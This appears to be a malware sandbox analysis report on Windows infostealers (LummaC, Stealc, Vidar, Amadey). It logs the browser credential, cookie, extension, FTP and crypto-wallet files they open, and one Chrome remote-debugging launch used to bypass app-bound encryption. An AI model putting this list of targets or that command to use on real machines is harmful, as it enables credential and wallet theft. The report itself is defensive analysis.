Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ

Source: Yara match	File source: 0000000E.00000003.2122030581.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2122645101.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: qFqSpAp.exe PID: 2028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7aencsM.exe PID: 3668, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Ta3ZyUR.exe PID: 6988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qFqSpAp.exe PID: 2028, type: MEMORYSTR
Source: Yara match	File source: 9.2.Ta3ZyUR.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.qFqSpAp.exe.1bb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.jROrnzx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Ta3ZyUR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jROrnzx.exe.3c09550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.jROrnzx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Ta3ZyUR.exe.3e19550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2193761654.0000000003C09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2323901817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2170321304.0000000001AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2775687019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\DTQCxXZ[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000000F.00000002.2158683213.000000000189E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2109898501.0000000005470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2150295559.0000000000E21000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: m5UP2Yj.exe PID: 5756, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7aencsM.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7aencsM.exe PID: 3668, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	12 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Extra Window Memory Injection	51 Obfuscated Files or Information	Security Account Manager	256 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	111 Registry Run Keys / Startup Folder	212 Process Injection	12 Software Packing	NTDS	1071 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Scheduled Task/Job	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	111 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	471 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	471 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	212 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Mshta	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hHtR1O06GH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

